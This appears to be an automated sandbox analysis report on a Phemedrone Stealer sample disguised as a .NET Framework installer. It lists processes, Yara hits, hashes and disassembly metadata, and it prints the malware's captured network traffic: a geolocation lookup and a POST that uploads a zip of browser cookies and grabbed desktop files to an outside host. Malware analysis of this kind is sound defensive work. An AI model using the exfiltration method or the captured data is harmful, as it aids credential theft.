                                                            Oct 4, 2023 15:57:52.480081081 CEST53544771.1.1.1192.168.2.4
                                                            Oct 4, 2023 15:57:59.671328068 CEST5920153192.168.2.41.1.1.1
                                                            Oct 4, 2023 15:57:59.858555079 CEST53592011.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 4, 2023 15:57:52.330095053 CEST192.168.2.41.1.1.10xdc57Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Oct 4, 2023 15:57:59.671328068 CEST192.168.2.41.1.1.10x1521Standard query (0)rakishev.netA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 4, 2023 15:57:52.480081081 CEST1.1.1.1192.168.2.40xdc57No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Oct 4, 2023 15:57:59.858555079 CEST1.1.1.1192.168.2.40x1521No error (0)rakishev.net104.21.88.34A (IP address)IN (0x0001)false
                                                            Oct 4, 2023 15:57:59.858555079 CEST1.1.1.1192.168.2.40x1521No error (0)rakishev.net172.67.150.79A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • ip-api.com
                                                            • rakishev.net

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.449683208.95.112.180C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 4, 2023 15:57:52.643373966 CEST1OUTGET /json/?fields=11827 HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Oct 4, 2023 15:57:52.793297052 CEST1INHTTP/1.1 200 OK
                                                            Date: Wed, 04 Oct 2023 13:57:52 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 191
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 50 68 6f 65 6e 69 78 22 2c 22 7a 69 70 22 3a 22 38 35 30 33 34 22 2c 22 69 73 70 22 3a 22 50 65 72 66 6f 72 6d 69 76 65 20 4c 4c 43 22 2c 22 6f 72 67 22 3a 22 54 6f 74 61 6c 20 73 65 72 76 65 72 20 73 6f 6c 75 74 69 6f 6e 73 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 34 36 35 36 32 20 50 65 72 66 6f 72 6d 69 76 65 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 38 34 2e 31 37 30 2e 32 34 30 2e 32 33 38 22 7d
                                                            Data Ascii: {"country":"United States","countryCode":"US","city":"Phoenix","zip":"85034","isp":"Performive LLC","org":"Total server solutions LLC","as":"AS46562 Performive LLC","query":"184.170.240.238"}


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.449687104.21.88.3480C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 4, 2023 15:58:00.013323069 CEST2OUTPOST /wp-load.php HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9
                                                            Host: rakishev.net
                                                            Content-Length: 486789
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Oct 4, 2023 15:58:00.237932920 CEST3INHTTP/1.1 100 Continue
                                                            Oct 4, 2023 15:58:00.239152908 CEST15OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 63 34 66 32 61 65 34 62 64 62 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d
                                                            Data Ascii: ------------------------------8dbc4f2ae4bdbe9Content-Disposition: form-data; name="file"; filename="(US)user-184.170.240.238-Phemedrone-Report.zip"Content-Type: application/octet-streamPK9DWe*##(HBrowser Data/Cookie
                                                            Oct 4, 2023 15:58:00.391238928 CEST17OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 63 34 66 32 61 65 34 62 64 62 65 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d
                                                            Data Ascii: ------------------------------8dbc4f2ae4bdbe9Content-Disposition: form-data; name="file"; filename="(US)user-184.170.240.238-Phemedrone-Report.zip"Content-Type: application/octet-streamPK9DWe*##(HBrowser Data/Cookie
                                                            Oct 4, 2023 15:58:00.391271114 CEST19OUTData Raw: 45 09 31 33 33 37 32 34 32 32 38 33 37 30 31 37 36 32 34 09 4d 43 31 09 47 55 49 44 3d 37 34 39 65 65 65 36 30 33 39 63 35 34 38 39 62 39 64 62 33 30 30 30 63 37 61 62 33 66 33 39 39 26 48 41 53 48 3d 37 34 39 65 26 4c 56 3d 32 30 32 33 31 30 26
                                                            Data Ascii: E13372422837017624MC1GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310&V=4&LU=1696413236917.microsoft.comTRUE/FALSE13340888637017694MS0a43a936188894b4eb131e15dd6312a5a.microsoft.comTRUE/FALSE13340973237000000MSCCNR
                                                            Oct 4, 2023 15:58:00.391271114 CEST21OUTData Raw: 4a 4b 50 56 53 56 42 52 59 59 47 56 57 53 5a 5a 4b 57 47 4f 58 56 4d 4a 41 44 50 58 57 4e 57 51 57 45 58 56 48 47 4e 54 42 4f 4c 46 4a 59 54 54 56 53 55 41 56 4c 4c 52 43 44 59 41 56 44 55 42 49 4f 57 55 4b 59 4c 4c 41 43 47 4f 4c 42 52 44 49 54
                                                            Data Ascii: JKPVSVBRYYGVWSZZKWGOXVMJADPXWNWQWEXVHGNTBOLFJYTTVSUAVLLRCDYAVDUBIOWUKYLLACGOLBRDITCAPRPEPKAQJYOSTDEWEDNTZYKILWOMZQUJXNKRUURYCFQJQWWOBLLZUBODEHHFONEKCSKAGAUZTILPQLMKOIHUKCKRREQAHDPK9DW1`"HFileGrabber/Desktop/WDOUVILBNM.pd
                                                            Oct 4, 2023 15:58:00.539980888 CEST24OUTData Raw: 44 42 4a 56 55 57 4e 4f 4d 44 53 48 58 4c 4c 4f 46 56 49 41 50 55 56 58 41 47 5a 45 53 44 55 4c 47 43 57 57 5a 46 42 55 56 4b 56 54 4e 54 58 58 51 54 45 4d 4d 50 0d 0a 50 4b 03 04 14 00 00 00 00 00 39 7f 44 57 96 31 08 60 02 04 00 00 02 04 00 00
                                                            Data Ascii: DBJVUWNOMDSHXLLOFVIAPUVXAGZESDULGCWWZFBUVKVTNTXXQTEMMPPK9DW1`-HFileGrabber/Desktop/RXNMAZWNWF/WDOUVILBNM.pdf 6 WDOUVILBNMJQSTSGPDFZNXOPXCCLOXCLAKFZLEXD
                                                            Oct 4, 2023 15:58:00.539980888 CEST25OUTData Raw: 54 45 58 4e 4c 54 55 59 4f 41 50 46 43 56 56 4b 4b 48 42 4b 51 4c 53 54 58 51 44 4b 52 4f 41 47 4c 53 42 45 4a 4f 54 4c 4a 42 53 4d 42 47 46 55 52 45 47 47 49 4c 50 55 56 4d 54 4f 54 43 47 59 46 56 55 52 4d 56 52 41 57 4a 59 4b 4d 50 4a 51 50 4d
                                                            Data Ascii: TEXNLTUYOAPFCVVKKHBKQLSTXQDKROAGLSBEJOTLJBSMBGFUREGGILPUVMTOTCGYFVURMVRAWJYKMPJQPMRZJHNQAFFKUJMQMPOJMEZVZFAADDYFAPSFRMELNAUMYAJTWIXZEVOTAFIANIYHMJPSKNTMRRNFQTJEVBAQSRZXPMKQQMGZJFRYWJCIIAYRFMREQTQPKSCXLJNHKJHXWDTWDFISRJOLZMOBLOJOYBAWMSLAVFQVRKR
                                                            Oct 4, 2023 15:58:00.539982080 CEST26OUTData Raw: 5a 45 46 4a 44 47 5a 47 45 47 43 46 42 43 43 50 4c 4a 4a 56 4e 4c 59 49 59 56 4d 4e 4b 42 45 56 45 42 57 4d 4e 49 57 50 4c 45 57 44 4f 47 41 59 44 5a 57 50 4c 42 44 4c 47 51 55 57 42 42 43 49 51 43 57 4a 41 4c 45 49 47 52 59 49 55 49 54 47 44 49
                                                            Data Ascii: ZEFJDGZGEGCFBCCPLJJVNLYIYVMNKBEVEBWMNIWPLEWDOGAYDZWPLBDLGQUWBBCIQCWJALEIGRYIUITGDISACELEQTMKZWFGWNOMTMIIAUUESVMHFGNZXPCQYTUYDFTZDJRYFQPBJXLRWUMFBGFGRWKNZJYXMDMIBGNQODSQPVAAXNVZTGDLCSNFETOEAWWEDILOWJENPJQSGTFWVUIKTWUFOABWLHIEEKBCDZKTWCXILHMCXSR
                                                            Oct 4, 2023 15:58:00.688889027 CEST29OUTData Raw: 54 51 4c 55 50 43 44 55 58 44 4c 50 58 53 44 50 53 5a 46 47 54 51 49 4d 54 4b 4d 57 4a 49 54 44 57 4b 57 56 51 5a 4f 57 55 50 53 47 44 45 46 46 4d 50 51 54 55 4c 58 43 48 4c 4e 47 47 45 55 56 50 52 54 5a 5a 48 48 52 57 4d 4d 48 46 55 46 47 52 4e
                                                            Data Ascii: TQLUPCDUXDLPXSDPSZFGTQIMTKMWJITDWKWVQZOWUPSGDEFFMPQTULXCHLNGGEUVPRTZZHHRWMMHFUFGRNJFLASXRINVXMVAHDDSSXCZJTWCJHSCIXYAGVKVZIZRRZIUMHAELDYEVJFPBZVWBGYHIWZBFIFUQDPGLCJCQPIZLDRFOQCRIQXSQWECAOWQOFGGQVFIWKHLSRVVUQRSCLNVXECXBTJCNMHYMRPXLYFCPZDMMIXULBK
                                                            Oct 4, 2023 15:58:00.688889980 CEST30OUTData Raw: 2f 74 2e 6d 65 2f 54 68 65 44 79 65 72 0d 0a 20 20 20 20 20 20 20 20 60 59 27 20 20 20 20 20 20 20 20 54 61 67 3a 20 70 72 6f 6c 69 76 0d 0a 0d 0a 20 20 20 20 2d 2d 2d 2d 2d 20 47 65 6f 6c 6f 63 61 74 69 6f 6e 20 44 61 74 61 20 2d 2d 2d 2d 2d 0d
                                                            Data Ascii: /t.me/TheDyer `Y' Tag: proliv ----- Geolocation Data -----IP: 184.170.240.238Country: United States (US)City: PhoenixPostal: 85034MAC:
                                                            Oct 4, 2023 15:58:00.689053059 CEST33OUTData Raw: 6a 40 48 60 1a 1b db eb 5b bf b5 f7 7f df 79 d6 9d a7 bb e7 5c 49 e0 cb 18 bf b1 d6 9a 73 ae 75 ce bd 92 13 f8 8d b9 f6 ae d5 2e 79 23 f4 97 4d 4d d8 d8 84 98 9b 1b 47 51 d5 c7 b3 e6 be de 96 fa c5 63 43 ed a2 f8 1d c6 19 35 f5 0b 3b a7 76 41 fc
                                                            Data Ascii: j@H`[y\Isu.y#MMGQcC5;vAs_kD-@F=~~2gZ~P;sQ;8~6+9k;b4%S-8eO^'6oj'WWHzb{/-}gU\Wo=77Wd"
                                                            Oct 4, 2023 15:58:08.536003113 CEST653INHTTP/1.1 200 OK
                                                            Date: Wed, 04 Oct 2023 13:58:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Powered-By: PHP/5.6.40
                                                            Set-Cookie: PHPSESSID=odijf1qt1a57ao77oc6li8naq3; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EyoCptb6%2BC1y5jFynoGoFFMw8FIhV6q1wxqKwloIJYXHkryFZEmvVjvAAT9z9nmx3yAB0hRj%2Bla9dwXNtf5S2rwqtOpab86tuKGqOCyUDvOyEwt5eKSMi6%2FILEv0l3s%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 810defeaf9e30ff5-LAX
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:15:57:49
                                                            Start date:04/10/2023
                                                            Path:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            Imagebase:0x340000
                                                            File size:2'605'056 bytes
                                                            MD5 hash:5D4392B56AA4EBAC400BBE86FE5D0767
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:1
                                                            Start time:15:57:49
                                                            Start date:04/10/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:15:57:50
                                                            Start date:04/10/2023
                                                            Path:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\ProgramData\Start Menu\G5K9HNJ7.exe"
                                                            Imagebase:0x210000
                                                            File size:889'416 bytes
                                                            MD5 hash:53406E9988306CBD4537677C5336ABA4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:3
                                                            Start time:15:57:50
                                                            Start date:04/10/2023
                                                            Path:C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe"
                                                            Imagebase:0x480000
                                                            File size:84'992 bytes
                                                            MD5 hash:AE881BAA8C3A00A94E5994826BDAC3AA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:15:57:52
                                                            Start date:04/10/2023
                                                            Path:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web
                                                            Imagebase:0x30000
                                                            File size:78'152 bytes
                                                            MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:6
                                                            Start time:15:57:57
                                                            Start date:04/10/2023
                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
                                                            Imagebase:0x760000
                                                            File size:1'620'872 bytes
                                                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            General

                                                            Target ID:11
                                                            Start time:15:58:00
                                                            Start date:04/10/2023
                                                            Path:C:\Windows\splwow64.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                            Imagebase:0x7ff71aab0000
                                                            File size:163'840 bytes
                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFDA15605A0 Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9bd22187d0fb9ff298fc9b782d813aa06326d75dca16d81606e6a3e93052ee4f
                                                              • Instruction ID: 2c1a46f84632de4f2edbc4e7c994576aad17f0a723e035b8988f70dfbbd4128a
                                                              • Opcode Fuzzy Hash: 9bd22187d0fb9ff298fc9b782d813aa06326d75dca16d81606e6a3e93052ee4f
                                                              • Instruction Fuzzy Hash: 51E1EE30A1CB468FD76ADB18C491576B3F1FF95300F184A7DD0AAC36A6DA35F8428B85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA1560E83 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: b1f4525149d440fe28057ab3204b22d6c8d4fc46db8b8f82104ae85715b67f71
                                                              • Instruction ID: 89743735d5baaaa98744afcd43a25dec7e03b7b4f2d28d5838e9d1b9aedc2eff
                                                              • Opcode Fuzzy Hash: b1f4525149d440fe28057ab3204b22d6c8d4fc46db8b8f82104ae85715b67f71
                                                              • Instruction Fuzzy Hash: A871BE30B28B458FD769DB08D491575B3F1FB98304F184A7DD0AAC36A6DA35F8438B85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA15607F8 Relevance: .4, Instructions: 424COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28d10a683d261988ba2202a217123ef7d719f151ad13b38c53a4097d06f5b2e4
                                                              • Instruction ID: 62d40278926eb1c5b33d886dd5e74ad6eb0a84ec1840bac39aa1afcf047135da
                                                              • Opcode Fuzzy Hash: 28d10a683d261988ba2202a217123ef7d719f151ad13b38c53a4097d06f5b2e4
                                                              • Instruction Fuzzy Hash: 33C10532B1DA494FEB59EB2884657B977E1EF99310F14017AE05DC33E7DE2868428B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA156086D Relevance: .3, Instructions: 273COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dcc9f8327a0237c26a5a5db4e4e31a62be1a92c022c75f34cd14aa060b8a8f2f
                                                              • Instruction ID: 113b9d005ba36ffb6a27c7fc55b6c5793772fe3454fe8ad97f511104d0852787
                                                              • Opcode Fuzzy Hash: dcc9f8327a0237c26a5a5db4e4e31a62be1a92c022c75f34cd14aa060b8a8f2f
                                                              • Instruction Fuzzy Hash: 6081B435B199494FEB98EB2884657B977E2FF98301F140179E05EC33E7DE28A8418B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA1560B65 Relevance: .2, Instructions: 248COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1f56dc20125570abeb1c32d7aba663905819bddc097d9b70b24ba7d22bc0a42
                                                              • Instruction ID: 4f63a7fdb098da438a1c1df870b6f5ceca447161451166f4ef8903068e993f6c
                                                              • Opcode Fuzzy Hash: d1f56dc20125570abeb1c32d7aba663905819bddc097d9b70b24ba7d22bc0a42
                                                              • Instruction Fuzzy Hash: 0871A175A1CA094FEB98EB28D456BF9B7E1FF95310F10417AD05EC3297DE34A8428B80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA1560D51 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e597ae85a53129c26071d65019dc4fcd420ca3d452aba6481230b2fef6069252
                                                              • Instruction ID: 05ce981bd5489df115529d307ebe4983be6b4d550696af8284bfbfdd7c063d81
                                                              • Opcode Fuzzy Hash: e597ae85a53129c26071d65019dc4fcd420ca3d452aba6481230b2fef6069252
                                                              • Instruction Fuzzy Hash: A6416B30A0DA860FD797972888656753BF5EFA6310F0C02B9D098C72E7DE58F802C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA1561642 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96726e02c9008202aafbc36e5181b2aba29e4b81a34d342a7e40a0f6f64d8e77
                                                              • Instruction ID: 34f76597cf3cae4001f452b9645c65f0b6173e8831a1788332fb7416baa67345
                                                              • Opcode Fuzzy Hash: 96726e02c9008202aafbc36e5181b2aba29e4b81a34d342a7e40a0f6f64d8e77
                                                              • Instruction Fuzzy Hash: 48D01732E1440E9BDB00EB58E8A12ECBBB1FF84201F901171E40DE7266DE387A558B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA1561738 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.808338733.00007FFDA1560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1560000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffda1560000_dotNetFx40_Full_setup.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f063d76f99d17e4178073197f8d53a95c306edd27687e1286996f43c1199b7e
                                                              • Instruction ID: e993a2e56510fa8f6b4344572d257b0cbdfe57cea1c2d2f8a020e013457f3113
                                                              • Opcode Fuzzy Hash: 3f063d76f99d17e4178073197f8d53a95c306edd27687e1286996f43c1199b7e
                                                              • Instruction Fuzzy Hash: FDC04C01B89509069B59A27834221A951C58B84161F855875E419C22DADC6E99910644
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:17.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:11.7%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:19
                                                              execution_graph 15430 229054 15470 22aac0 15430->15470 15432 229060 GetStartupInfoW 15433 229074 HeapSetInformation 15432->15433 15435 22907f 15432->15435 15433->15435 15471 22aa99 HeapCreate 15435->15471 15436 2290cd 15437 2290d8 15436->15437 15624 229026 15436->15624 15472 22a919 GetModuleHandleW 15437->15472 15440 2290de 15441 2290e9 __RTC_Initialize 15440->15441 15442 229026 _fast_error_exit 66 API calls 15440->15442 15497 22a299 GetStartupInfoW 15441->15497 15442->15441 15445 229103 GetCommandLineA 15510 22a1fd GetEnvironmentStringsW 15445->15510 15452 229128 15534 229ebd 15452->15534 15453 229aca __amsg_exit 66 API calls 15453->15452 15455 22912e 15456 229139 15455->15456 15457 229aca __amsg_exit 66 API calls 15455->15457 15554 22988b 15456->15554 15457->15456 15459 229141 15460 22914c 15459->15460 15462 229aca __amsg_exit 66 API calls 15459->15462 15560 229e59 15460->15560 15462->15460 15466 22917c 15642 229aa2 15466->15642 15469 229181 __commit 15470->15432 15471->15436 15473 22a936 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15472->15473 15474 22a92d 15472->15474 15476 22a980 TlsAlloc 15473->15476 15645 22a5da 15474->15645 15479 22a9ce TlsSetValue 15476->15479 15480 22aa8f 15476->15480 15479->15480 15481 22a9df 15479->15481 15480->15440 15655 22982a 15481->15655 15486 22aa27 _DecodePointerInternal 15489 22aa3c 15486->15489 15487 22aa8a 15488 22a5da __mtterm 70 API calls 15487->15488 15488->15480 15489->15487 15664 22dc24 15489->15664 15492 22aa5a _DecodePointerInternal 15493 22aa6b 15492->15493 15493->15487 15494 22aa6f 15493->15494 15670 22a61c 15494->15670 15496 22aa77 GetCurrentThreadId 15496->15480 15498 22dc24 __calloc_crt 66 API calls 15497->15498 15501 22a2b7 15498->15501 15499 2290f7 15499->15445 15632 229aca 15499->15632 15500 22a462 GetStdHandle 15502 22a42c 15500->15502 15501->15499 15501->15502 15503 22dc24 __calloc_crt 66 API calls 15501->15503 15509 22a3ac 15501->15509 15502->15500 15504 22a4c6 SetHandleCount 15502->15504 15505 22a474 GetFileType 15502->15505 15508 22a49a InitializeCriticalSectionAndSpinCount 15502->15508 15503->15501 15504->15499 15505->15502 15506 22a3e3 InitializeCriticalSectionAndSpinCount 15506->15499 15506->15509 15507 22a3d8 GetFileType 15507->15506 15507->15509 15508->15499 15508->15502 15509->15502 15509->15506 15509->15507 15512 22a219 15510->15512 15516 229113 15510->15516 15511 22a22e WideCharToMultiByte 15513 22a286 FreeEnvironmentStringsW 15511->15513 15514 22a24e 15511->15514 15512->15511 15512->15512 15513->15516 15515 22dbda __malloc_crt 66 API calls 15514->15515 15517 22a254 15515->15517 15523 22a13d 15516->15523 15517->15513 15518 22a25c WideCharToMultiByte 15517->15518 15519 22a27a FreeEnvironmentStringsW 15518->15519 15520 22a26e 15518->15520 15519->15516 15521 22c318 _free 66 API calls 15520->15521 15522 22a276 15521->15522 15522->15519 15524 22a152 15523->15524 15525 22a157 GetModuleFileNameA 15523->15525 15918 22ca40 15524->15918 15527 22a17e 15525->15527 15912 229f9e 15527->15912 15529 22911d 15529->15452 15529->15453 15531 22dbda __malloc_crt 66 API calls 15532 